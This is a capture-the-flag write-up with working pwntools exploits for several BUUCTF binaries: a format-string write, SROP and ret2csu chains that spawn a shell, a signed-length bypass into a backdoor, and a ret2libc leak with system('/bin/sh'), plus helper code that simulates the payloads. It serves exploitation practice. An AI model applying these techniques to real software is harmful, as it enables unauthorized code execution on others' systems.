PWN-PRACTICE-BUUCTF-7
- jarvisoj_fm
- ciscn_2019_s_3
- SROP solution
- ret2csu solution
- bjdctf_2020_babystack2
- [HarekazeCTF2019]baby_rop2
jarvisoj_fm
Format string vulnerability. By testing, the offset of our input on the stack is argument 11.
The payload can be built by hand or with fmtstr_payload; the goal is to make x == 4.
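As an added illustration (not code from the original writeup): a pure-Python version of what fmtstr_payload generates for this offset, plus a small model of printf's byte counter so the payload can be checked before it is sent. It assumes a 32-bit target and a made-up address 0x0804A02C for x; the real address comes from the binary.

```python
import re
import struct


def p32(x):
    return struct.pack("<I", x & 0xFFFFFFFF)


def fmt_write32(target, value, offset, written=0):
    """Build a format string that stores the 32-bit `value` at `target` with two %hn writes.
    `offset` is the printf argument index where our input sits on the stack (11 for jarvisoj_fm);
    `written` is how many bytes printf has already emitted before our input is printed."""
    halves = [(target, value & 0xFFFF), (target + 2, (value >> 16) & 0xFFFF)]
    # The two addresses go first, so they are printf args `offset` and `offset + 1`.
    # They must not contain 0x00 (ends the format string) or '%' for this to work on real printf.
    addrs = b"".join(p32(a) for a, _ in halves)
    written += len(addrs)            # the address bytes themselves are printed first
    fmt = ""
    # Emit the smaller half first so every %c padding stays small; %hn stores only the low
    # 16 bits of the counter, so wrapping through 0x10000 is harmless.
    for i, (_, half) in sorted(enumerate(halves), key=lambda t: t[1][1]):
        pad = (half - written) % 0x10000
        if pad:
            fmt += f"%{pad}c"
            written += pad
        fmt += f"%{offset + i}$hn"
    return addrs + fmt.encode()


_CONV = re.compile(rb"%(\d+)(c|\$hn)")


def simulate_printf(payload, offset, memory=None):
    """Minimal model of printf on the payload: %Nc adds N to the output counter, %K$hn stores the
    low 16 bits of the counter at the address held in stack argument K, i.e. payload word K-offset.
    Returns {address: 16-bit value written}."""
    memory = {} if memory is None else memory
    count = pos = 0
    for m in _CONV.finditer(payload):
        count += m.start() - pos     # literal bytes (including the packed addresses) are output as-is
        pos = m.end()
        n = int(m.group(1))
        if m.group(2) == b"c":
            count += n
        else:
            addr = struct.unpack_from("<I", payload, (n - offset) * 4)[0]
            memory[addr] = count & 0xFFFF
    return memory


def read32(memory, addr):
    """Reassemble the two 16-bit halves the payload wrote."""
    return memory.get(addr, 0) | (memory.get(addr + 2, 0) << 16)


X_ADDR = 0x0804A02C   # hypothetical address of x; use the real one from the binary

if __name__ == "__main__":
    payload = fmt_write32(X_ADDR, 4, 11)
    print(payload)
    print(hex(read32(simulate_printf(payload, 11), X_ADDR)))
```

The simulator is deliberately tiny (it knows only %Nc and %K$hn), but it catches the two usual mistakes, a wrong offset and a padding count that does not wrap the way %hn expects, before a single byte reaches the service.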
ciscn_2019_s_3
First the protections: Partial RELRO and NX are enabled.
main only calls a vuln function; after F5 (decompiling) it shows a sys_read and a sys_write.
Both are raw syscalls: sys_read writes up to 0x400 bytes onto the stack, sys_write sends out up to 0x30 bytes from the stack.
0x400 and 0x30 both exceed buf's 0x10 bytes, so we get a stack overflow and a stack leak.
Note that after 0x00000000004004EE (the mov rbp, rsp) the stack is not lowered any further: rbp and rsp stay equal, and the code below addresses buf relative to rsp.
So for the overflow, once buf's 0x10 bytes are filled, the very next 8 bytes are the address we return to; there is no saved-rbp slot to skip.
Now the gadgets: one sets rax to 15 and returns; the one right below it sets rax to 59 and returns.
Combined with the syscall instruction seen earlier: syscall number 15 is sigreturn and 59 is execve.
So the challenge has two solutions, SROP and ret2csu. Both aim to execute execve("/bin/sh", 0, 0), and both first need sys_write to leak a stack address, from which the address of the "/bin/sh" string is computed.
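The two chains described above, rebuilt without pwntools as an added example (not code from the original writeup). sigreturn_frame() lays out the x86-64 sigreturn frame the way pwntools' SigreturnFrame serializes it, so it is visible which word ends up in which register, and emulate_ret2csu() steps the ret2csu chain through a model of the __libc_csu_init gadget pair and reports the registers at the moment syscall runs, which is the check worth doing before sending anything. Addresses are the ones from the writeup's scripts; the gadget semantics (mov rdx, r13; mov rsi, r14; mov edi, r15d; call [r12+rbx*8]) and the assumption that the second read lands 8 bytes above the leaked "/bin/sh" address (which is what rax_59_stack = binsh + 0x10 in the writeup implies) are mine.

```python
import struct

def p64(x):
    return struct.pack("<Q", x & 0xFFFFFFFFFFFFFFFF)

def u64(b):
    return struct.unpack("<Q", b)[0]

# Addresses from the writeup's scripts (ciscn_s_3 is not PIE).
RAX_15, RAX_59 = 0x4004DA, 0x4004E2        # mov rax,15 ; ret   and   mov rax,59 ; ret
SYSCALL = 0x400517                          # syscall
CSU_POP, CSU_CALL = 0x40059A, 0x400580      # __libc_csu_init: pop-six tail / mov-and-call head
POP_RDI = 0x4005A3
SYS_EXECVE = 59

# x86-64 rt_sigframe after the pretcode word: struct ucontext then uc_sigmask, 31 qwords.
# Same field order pwntools' SigreturnFrame uses for amd64.
FRAME_FIELDS = (
    "uc_flags", "uc_link", "ss_sp", "ss_flags", "ss_size",
    "r8", "r9", "r10", "r11", "r12", "r13", "r14", "r15",
    "rdi", "rsi", "rbp", "rbx", "rdx", "rax", "rcx", "rsp", "rip",
    "eflags", "csgsfs", "err", "trapno", "oldmask", "cr2", "fpstate", "reserved", "sigmask",
)

def sigreturn_frame(**regs):
    """Serialize a frame; csgsfs defaults to 0x33 (64-bit user code segment), everything else to 0."""
    vals = dict.fromkeys(FRAME_FIELDS, 0)
    vals["csgsfs"] = 0x33
    for name, val in regs.items():
        if name not in vals:
            raise KeyError(name)
        vals[name] = val
    return b"".join(p64(vals[f]) for f in FRAME_FIELDS)

def unpack_frame(blob):
    """Inverse of sigreturn_frame: inspect a frame's registers before sending it."""
    return dict(zip(FRAME_FIELDS, struct.unpack("<31Q", blob)))

def srop_payload(binsh):
    """Round-2 SROP payload: fill buf, ret to rax=15, syscall -> sigreturn loads the frame."""
    frame = sigreturn_frame(rax=SYS_EXECVE, rdi=binsh, rsi=0, rdx=0, rip=SYSCALL)
    return b"/bin/sh\x00" + b"a" * 8 + p64(RAX_15) + p64(SYSCALL) + frame

def ret2csu_payload(binsh):
    """Round-2 ret2csu payload, laid out like the writeup's com_gadget()."""
    rax59_slot = binsh + 0x10   # stack address of the p64(RAX_59) word below (assumption, see lead-in)
    chain = b"/bin/sh\x00" + p64(RAX_59) + p64(CSU_POP)
    chain += p64(0) + p64(1) + p64(rax59_slot) + p64(0) + p64(0) + p64(SYS_EXECVE)  # rbx..r15
    chain += p64(CSU_CALL) + b"a" * 56 + p64(POP_RDI) + p64(binsh) + p64(SYSCALL)
    return chain

def emulate_ret2csu(chain, buf_addr, ret_slot=0x10, max_steps=64):
    """Run the chain through a model of the gadgets it uses; return the registers at `syscall`.
    The chain is the stack, loaded at buf_addr; vuln's bare ret pops the word at buf_addr+ret_slot."""
    stack = bytearray(chain)
    regs = dict.fromkeys(("rax", "rbx", "rbp", "rdi", "rsi", "rdx", "r12", "r13", "r14", "r15"), 0)
    rsp = buf_addr + ret_slot

    def rd(addr):
        return u64(stack[addr - buf_addr:addr - buf_addr + 8])

    def pop():
        nonlocal rsp
        rsp += 8
        return rd(rsp - 8)

    after_call = CSU_CALL + 13   # the `add rbx,1` that follows `call [r12+rbx*8]`
    rip = pop()
    for _ in range(max_steps):
        if rip == CSU_POP:         # pop rbx ; pop rbp ; pop r12 ; pop r13 ; pop r14 ; pop r15 ; ret
            for r in ("rbx", "rbp", "r12", "r13", "r14", "r15"):
                regs[r] = pop()
            rip = pop()
        elif rip == CSU_CALL:      # mov rdx,r13 ; mov rsi,r14 ; mov edi,r15d ; call [r12+rbx*8]
            regs["rdx"], regs["rsi"], regs["rdi"] = regs["r13"], regs["r14"], regs["r15"] & 0xFFFFFFFF
            rsp -= 8
            stack[rsp - buf_addr:rsp - buf_addr + 8] = p64(after_call)   # pushed return address
            rip = rd(regs["r12"] + regs["rbx"] * 8)
        elif rip == after_call:    # add rbx,1 ; cmp rbp,rbx ; jne CSU_CALL ; add rsp,8 ; then CSU_POP
            regs["rbx"] += 1
            rip = CSU_CALL if regs["rbx"] != regs["rbp"] else CSU_POP
            if rip == CSU_POP:
                rsp += 8
        elif rip == RAX_59:        # mov rax,59 ; ret
            regs["rax"] = SYS_EXECVE
            rip = pop()
        elif rip == POP_RDI:       # pop rdi ; ret
            regs["rdi"] = pop()
            rip = pop()
        elif rip == SYSCALL:
            return regs
        else:
            raise RuntimeError(f"left the modelled gadgets at {rip:#x}")
    raise RuntimeError("chain never reached syscall")
```

The emulator is where the 56 bytes of filler in the ret2csu chain stop being magic: after call [r12] returns, rbx becomes 1 == rbp, the loop exits, add rsp, 8 drops one word and the six pops eat the rest, so the word after the filler is the next return address.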
SROP solution
```python
from pwn import *

# context.log_level = "debug"
context.os = "linux"
context.arch = "amd64"              # SigreturnFrame() needs the arch to pick the x86-64 layout
# io = process('./ciscn_s_3')
io = remote('node4.buuoj.cn', 28749)
elf = ELF('./ciscn_s_3')

read_write = 0x00000000004004F1     # vuln body: sys_read into buf, then sys_write 0x30 bytes from buf
gadgets    = 0x00000000004004DA     # mov rax, 15 ; ret   (15 = sigreturn)
syscall    = 0x0000000000400517     # syscall

# Round 1: fill buf (0x10), overwrite the return slot with read_write so vuln runs once more,
# and let sys_write leak 0x30 bytes of stack.
payload = b"/bin/sh\x00" + b"a" * 8 + p64(read_write)
io.sendline(payload)
io.recv(0x20)                       # skip buf and the two words after it
binsh = u64(io.recv(8)) - 0x118     # leaked stack pointer -> address of our "/bin/sh"
print(hex(binsh))

# Round 2: rax = 15, syscall -> sigreturn pops the forged frame as the new register set,
# which lands on syscall again with rax = 59 (execve).
frame = SigreturnFrame()
frame.rax = constants.SYS_execve
frame.rdi = binsh
frame.rsi = 0
frame.rdx = 0
frame.rip = syscall
payload = b"/bin/sh\x00" + b"a" * 8 + p64(gadgets) + p64(syscall) + bytes(frame)
io.sendline(payload)
io.interactive()
```
ret2csu solution
```python
from pwn import *

# context.log_level = "debug"
context.os = "linux"
context.arch = "amd64"
# io = process('./ciscn_s_3')
io = remote('node4.buuoj.cn', 28749)
elf = ELF('./ciscn_s_3')

read_write  = 0x00000000004004F1    # vuln body: sys_read into buf, then sys_write 0x30 bytes from buf
rax_59      = 0x00000000004004E2    # mov rax, 59 ; ret   (59 = execve)
syscall     = 0x0000000000400517    # syscall
pop_rdi_ret = 0x00000000004005a3

# Round 1: overwrite the return slot with read_write to get a second read, leak 0x30 bytes of stack
payload = b"/bin/sh\x00" + p64(rax_59) + p64(read_write)
io.sendline(payload)
io.recv(0x20)
binsh = u64(io.recv(8)) - 0x118     # leaked stack pointer -> address of our "/bin/sh"
print(hex(binsh))
rax_59_stack = binsh + 0x10         # where p64(rax_59) of the next payload lands; csu will call [r12]
print(hex(rax_59_stack))

# __libc_csu_init gadgets
gadget_2 = 0x0000000000400580       # mov rdx, r13 ; mov rsi, r14 ; mov edi, r15d ; call [r12+rbx*8] ; ...
gadget_1 = 0x000000000040059A       # pop rbx ; pop rbp ; pop r12 ; pop r13 ; pop r14 ; pop r15 ; ret

def com_gadget(rbx, rbp, r12, r13, r14, r15, main_addr):
    payload = b"/bin/sh\x00" + p64(rax_59)
    payload += p64(gadget_1)
    payload += p64(rbx) + p64(rbp) + p64(r12) + p64(r13) + p64(r14) + p64(r15)
    payload += p64(gadget_2)
    payload += b"a" * 56            # add rsp, 8 plus the six pops after the loop exits (rbx == rbp == 1)
    payload += p64(main_addr)
    return payload

# r12 -> p64(rax_59) and rbx = 0, so call [r12] sets rax = 59; r13/r14 give rdx = rsi = 0;
# then pop rdi <- "/bin/sh" and ret into syscall.
payload = com_gadget(0, 1, rax_59_stack, 0, 0, 59, pop_rdi_ret)
payload += p64(binsh) + p64(syscall)
io.sendline(payload)
io.interactive()
```
bjdctf_2020_babystack2
When asked for the length, enter "-1" to get past the length check; after that it is a plain stack overflow, overwriting the return address with backdoor.
```python
from pwn import *

# io = process('./bjdctf_2020_babystack2')
io = remote('node4.buuoj.cn', 25885)
elf = ELF('./bjdctf_2020_babystack2')
backdoor = elf.sym['backdoor']

io.recvuntil(b'name:\n')
io.sendline(b'-1')                  # accepted by the length check, but acts as a huge size for the read
io.recvuntil(b'name?\n')
payload = b'a' * (0x10 + 8) + p64(backdoor)   # 0x10 buf + saved rbp, then return into backdoor
io.sendline(payload)
io.interactive()
```
[HarekazeCTF2019]baby_rop2
Stack overflow, ret2libc: leak read's address through printf, compute the libc base, then call system("/bin/sh").
```python
from pwn import *

context.log_level = "debug"
io = remote('node4.buuoj.cn', 28557)
# io = process('./babyrop2')
elf = ELF('./babyrop2')
libc = ELF('./libc.so.6')

printf_plt = elf.plt['printf']
read_got = elf.got['read']
main = 0x0000000000400636
pop_rdi_ret = 0x0000000000400733
pop_rsi_r15_ret = 0x0000000000400731
ret = 0x00000000004004d1            # plain ret, used to realign the stack before system
s = 0x0000000000400770              # format string in the binary containing "again, %s"

# Stage 1: printf(s, read@got) prints read's address via %s, then return to main for a second overflow
io.recvuntil(b"name? ")
payload = b"a" * (0x20 + 8)
payload += p64(pop_rdi_ret) + p64(s)
payload += p64(pop_rsi_r15_ret) + p64(read_got) + p64(0)
payload += p64(printf_plt) + p64(main)
io.sendline(payload)
io.recvline()
io.recvuntil(b"again, ")
read_addr = u64(io.recvuntil(b'\x7f')[-6:].ljust(8, b'\x00'))   # 6 significant bytes of a libc pointer
print(hex(read_addr))
libc_base = read_addr - libc.sym['read']
system = libc_base + libc.sym['system']
binsh = libc_base + next(libc.search(b"/bin/sh"))

# Stage 2: system("/bin/sh"); the extra ret keeps rsp 16-byte aligned when system runs
payload = b"a" * (0x20 + 8) + p64(pop_rdi_ret) + p64(binsh) + p64(ret) + p64(system) + p64(main)
io.recvuntil(b"name? ")
io.sendline(payload)
io.sendline(b"cat /home/babyrop2/flag")
io.interactive()
```
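The leak handling and the two chains of this solution, as an added example (not code from the original writeup) that runs without pwntools or the remote service. It keeps the gadget addresses from the script; the PLT/GOT addresses, the libc offsets and the printed output are constructed stand-ins for what elf.plt, elf.got, libc.sym, libc.search and the service would give you.

```python
import struct

def p64(x):
    return struct.pack("<Q", x & 0xFFFFFFFFFFFFFFFF)

# Gadgets and addresses from the writeup (babyrop2 is not PIE).
POP_RDI_RET = 0x400733
POP_RSI_R15_RET = 0x400731
RET = 0x4004D1
MAIN = 0x400636
FMT_S = 0x400770            # format string inside the binary containing "again, %s"
PRINTF_PLT = 0x4005F0       # constructed stand-in for elf.plt['printf']
READ_GOT = 0x601020         # constructed stand-in for elf.got['read']
PAD = 0x20 + 8              # buffer plus saved rbp

# Constructed stand-ins for libc.sym['read'], libc.sym['system'] and next(libc.search(b"/bin/sh")).
# The real values come from the libc.so.6 shipped with the challenge.
LIBC_READ, LIBC_SYSTEM, LIBC_BINSH = 0xF7250, 0x45390, 0x18CD57

def leak_chain():
    """Stage 1: printf(FMT_S, read@got) prints read's address through %s, then returns to main."""
    return (b"a" * PAD + p64(POP_RDI_RET) + p64(FMT_S)
            + p64(POP_RSI_R15_RET) + p64(READ_GOT) + p64(0)
            + p64(PRINTF_PLT) + p64(MAIN))

def extract_pointer(output, marker=b"again, "):
    """Recover the leaked pointer from printf's output: %s prints the 6 non-zero bytes of a
    userland address (ending in 0x7f) and stops at the NUL above them; zero-extend to 8 bytes.
    This is what recvuntil(0x7f)[-6:].ljust(8, NUL) in the script does."""
    start = output.index(marker) + len(marker)
    end = output.index(b"\x7f", start) + 1
    raw = output[start:end][-6:]
    if len(raw) != 6:
        raise ValueError("leak too short: a NUL byte inside the address cut the %s output")
    return struct.unpack("<Q", raw.ljust(8, b"\x00"))[0]

def libc_base(read_addr):
    """Base from the leak; a base that is not page aligned means a wrong libc or a bad leak."""
    base = read_addr - LIBC_READ
    if base & 0xFFF:
        raise ValueError(f"libc base {base:#x} is not page aligned")
    return base

def system_chain(base):
    """Stage 2: system("/bin/sh"). The extra RET keeps rsp 16-byte aligned when system runs;
    glibc's SSE code (movaps) faults otherwise, which is the usual reason this chain crashes."""
    return (b"a" * PAD + p64(POP_RDI_RET) + p64(base + LIBC_BINSH)
            + p64(RET) + p64(base + LIBC_SYSTEM) + p64(MAIN))

# Constructed sample of the service's output after stage 1: read at 0x7f3f11107250 -> 6 bytes.
SAMPLE_OUTPUT = b"Welcome again, " + b"\x50\x72\x10\x11\x3f\x7f" + b"!\nWhat's your name? "

if __name__ == "__main__":
    base = libc_base(extract_pointer(SAMPLE_OUTPUT))
    print(hex(base), system_chain(base).hex())
```

The page-alignment check is cheap and catches the most common failure of this kind of exploit, an offset taken from a libc that is not the one the service runs, before the second payload is sent.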